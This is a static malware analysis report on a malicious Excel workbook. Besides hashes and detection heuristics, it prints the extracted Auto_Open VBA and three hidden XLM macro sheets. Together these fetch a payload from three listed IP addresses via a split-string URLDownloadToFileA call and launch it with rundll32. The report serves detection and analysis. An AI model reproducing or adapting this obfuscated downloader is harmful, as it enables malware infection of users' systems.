Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d263bf281109edc7…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 114.2 KB
Created: 2015-06-05 18:19:34 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-05-15
MD5: dd2f00d3e39352ccdd2b3ef8b00846a0
SHA-1: dd1a9ec8abd1697db8d33a9e58b74fd2e0491bb7
SHA-256: d263bf281109edc7bdea47ddfe281b9a2c8b4e265de8aa9dcefffc30fc58602a
Risk score: 158

Heuristics (6)

  • Excel 4.0 macro sheet (3 sheet(s)) [severity: critical; 1 related finding; rule: OOXML_XLM_MACROSHEET]
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Dangerous XLM formula APIs: FORMULA, HALT, GOTO, REGISTER, EXEC [severity: critical; rule: OOXML_XLM_DANGEROUS_FN]
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • VBA project inside OOXML [severity: medium; 1 related finding; rule: OOXML_VBA]
    Document contains a VBA project — VBA macros present.
  • Auto_Open macro [severity: low; rule: OLE_VBA_AUTO]
    Auto_Open macro present. Matched line in script:
    Private Sub Auto_Open()
  • Hidden worksheet (hidden) [severity: low; rule: OOXML_HIDDEN_SHEET]
    Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction.
  • Embedded URL [severity: info; rule: EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://91.211.91.81/44313,6048108796.dat (referenced by macro)
    • http://5.34.179.36/44313,6048108796.dat (referenced by macro)
    • http://45.153.229.23/44313,6048108796.dat (referenced by macro)
    • http://91.211.91.81/ (referenced by macro)
    • http://5.34.179.36/ (referenced by macro)
    • http://45.153.229.23/ (referenced by macro)
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revision (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6 (in document text: OOXML body / shared strings)

Extracted artifacts (5)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2437 bytes
SHA-256: aa10abebc3ece39bf198cf3383ccb30417606e0a98d60e87747026c15426213c
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Kikide"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True




Attribute VB_Name = "Briks"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Byutut"

Attribute VB_Name = "Vsewd"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Blasr"
Private Sub Auto_Open()
Application.Run Sheets("Nyukasl").Range("AJ6")

Application.Run Sheets("Nyukasl").Range("A5")
Application.Run Sheets("Nyukasl").Range("A5")






End Sub

Attribute VB_Name = "Vrest"

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 23552 bytes
SHA-256: c273c0ba9b123bfd6c5297a7692bdade93c1afc5139260c65963114883a46fd3
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 4505 bytes
SHA-256: 665f6c9f9b4a972fb7c9cd862f5d81f8391866e0188d24c7f028f17a82f6de37
Preview (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{5E3EE2C8-4BD1-4A7A-8165-1C49BDB78CBA}">
<dimension ref="AE74:AK92"/>
<sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews>
<sheetFormatPr defaultColWidth="13.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
<cols><col min="1" max="29" width="13.5703125" style="4"/><col min="30" max="30" width="13.5703125" style="4" customWidth="1"/><col min="31" max="33" width="13.5703125" style="4" hidden="1" customWidth="1"/><col min="34" max="34" width="17.42578125" style="4" hidden="1" customWidth="1"/><col min="35" max="35" width="13.5703125" style="4" hidden="1" customWidth="1"/><col min="36" max="36" width="21.5703125" style="4" hidden="1" customWidth="1"/><col min="37" max="37" width="13.5703125" style="2" hidden="1" customWidth="1"/><col min="38" max="38" width="13.5703125" style="4"/><col min="39" max="39" width="21.42578125" style="4" bestFit="1" customWidth="1"/><col min="40" max="16384" width="13.5703125" style="4"/></cols>
<sheetData>
<row r="74" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG74" s="4" t="str"><f>CONCATENATE(AF80,AG80,AH78,AG78,AG79)</f><v>http://91.211.91.81/44313,6048108796.dat</v></c></row>
<row r="75" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG75" s="4" t="str"><f>CONCATENATE(AF80,AG81,AH78,AG78,AG79)</f><v>http://5.34.179.36/44313,6048108796.dat</v></c><c r="AI75" s="4"><v>1</v></c></row>
<row r="76" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG76" s="4" t="str"><f>CONCATENATE(AF80,AG82,AH78,AG78,AG79)</f><v>http://45.153.229.23/44313,6048108796.dat</v></c><c r="AI76" s="4"><v>9</v></c></row>
<row r="77" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AJ77" s="4" t="b"><f>ON.TIME(NOW()+"00:00:02","Grestes")</f><v>0</v></c></row>
<row r="78" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG78" s="4" t="s"><v>0</v></c><c r="AH78" s="4"><f>NOW()</f><v>44313.604810879631</v></c></row>
<row r="79" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG79" s="4" t="s"><v>1</v></c><c r="AH79" s="4" t="b"><f>FORMULA(AG85&amp;AG86&amp;AG92,AI83)</f><v>0</v></c></row>
<row r="80" spans="32:36" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AF80" s="4" t="str"><f>"http://"</f><v>http://</v></c><c r="AG80" s="4" t="str"><f>"91.211.91.81/"</f><v>91.211.91.81/</v></c><c r="AJ80" s="4" t="b"><f>HALT()</f><v>0</v></c></row>
<row r="81" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG81" s="4" t="str"><f>"5.34.179.36/"</f><v>5.34.179.36/</v></c></row>
<row r="82" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG82" s="4" t="str"><f>"45.153.229.23/"</f><v>45.153.229.23/</v></c><c r="AI82" s="4" t="s"><v>2</v></c></row>
<row r="84" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AI84" s="4" t="s"><v>3</v></c></row>
<row r="85" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG85" s="4" t="str"><f>"URLDo"</f><v>URLDo</v></c><c r="AI85" s="4" t="s"><v>4</v></c></row>
<row r="86" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG86" s="4" t="str"><f>"wnloadT"</f><v>wnloadT</v></c></row>
<row r="87" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AH87" s="4" t="e"><f>GOTO(Blodas!G6)</f><v>#N/A</v></c></row>
<row r="88" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AI88" s="4" t="s"><v>5</v></c></row>
<row r="92" spans="33:35" s="4" customFormat="1" x14ac:dyDescent="0.25"><c r="AG92" s="4" t="str"><f>"oFileA"</f><v>oFileA</v></c></row>
</sheetData>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
<pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
xlm_sheet_01.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet2.xml 2129 bytes
SHA-256: c842664d4adfbab64cc38d3d12f48bc3fe942196965e9c614671ea94f3e6afd5
Preview (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{B06B5105-687C-43F7-A487-3A7680CBC977}">
<dimension ref="G11:G18"/>
<sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews>
<sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
<cols><col min="1" max="6" width="9.140625" style="3"/><col min="7" max="7" width="12.140625" style="3" customWidth="1"/><col min="8" max="16384" width="9.140625" style="3"/></cols>
<sheetData>
<row r="11" spans="7:7" x14ac:dyDescent="0.25"><c r="G11" s="3" t="b"><f>REGISTER(Nyukasl!AI82,Nyukasl!AI83,Nyukasl!AI84,Nyukasl!AI85,,Nyukasl!AI75,9)</f><v>0</v></c></row>
<row r="12" spans="7:7" x14ac:dyDescent="0.25"><c r="G12" s="3" t="e"><f>Belandes(0,Nyukasl!AG74,Nyukasl!AI88,0,0)</f><v>#NAME?</v></c></row>
<row r="13" spans="7:7" x14ac:dyDescent="0.25"><c r="G13" s="3" t="e"><f>IF(G12&lt;0, Belandes(0,Nyukasl!AG75,Nyukasl!AI88,0,0))</f><v>#NAME?</v></c></row>
<row r="14" spans="7:7" x14ac:dyDescent="0.25"><c r="G14" s="3" t="e"><f>IF(G13&lt;0, Belandes(0,Nyukasl!AG76,Nyukasl!AI88,0,0))</f><v>#NAME?</v></c></row>
<row r="16" spans="7:7" x14ac:dyDescent="0.25"><c r="G16" s="3"><f>IF(G14&lt;0,CLOSE(0),)</f><v>0</v></c></row>
<row r="18" spans="7:7" x14ac:dyDescent="0.25"><c r="G18" s="3" t="e"><f>GOTO(Jioka!H4)</f><v>#N/A</v></c></row>
</sheetData>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
xlm_sheet_02.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet3.xml 1949 bytes
SHA-256: 10c797d7a3c632796484bdf562cdd2d33c46d8d630def0609945fce50d2eff68
Preview (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{7CC12E8C-181F-40F2-A690-14110549575E}">
<dimension ref="H7:I20"/>
<sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews>
<sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
<cols><col min="1" max="7" width="9.140625" style="3"/><col min="8" max="8" width="9.85546875" style="3" customWidth="1"/><col min="9" max="16384" width="9.140625" style="3"/></cols>
<sheetData>
<row r="7" spans="8:9" x14ac:dyDescent="0.25"><c r="I7" s="3" t="str"><f>"rund"</f><v>rund</v></c></row>
<row r="9" spans="8:9" x14ac:dyDescent="0.25"><c r="I9" s="3" t="str"><f>"ll32 ..\Ladfge.VDGfwr,DllReg"</f><v>ll32 ..\Ladfge.VDGfwr,DllReg</v></c></row>
<row r="10" spans="8:9" x14ac:dyDescent="0.25"><c r="I10" s="3" t="str"><f>"isterServer"</f><v>isterServer</v></c></row>
<row r="16" spans="8:9" x14ac:dyDescent="0.25"><c r="H16" s="3" t="b"><f>PI()=EXEC(I7&amp;I9&amp;I10)=PI()</f><v>0</v></c></row>
<row r="20" spans="8:8" x14ac:dyDescent="0.25"><c r="H20" s="3" t="b"><f>HALT()</f><v>0</v></c></row>
</sheetData>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
<pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>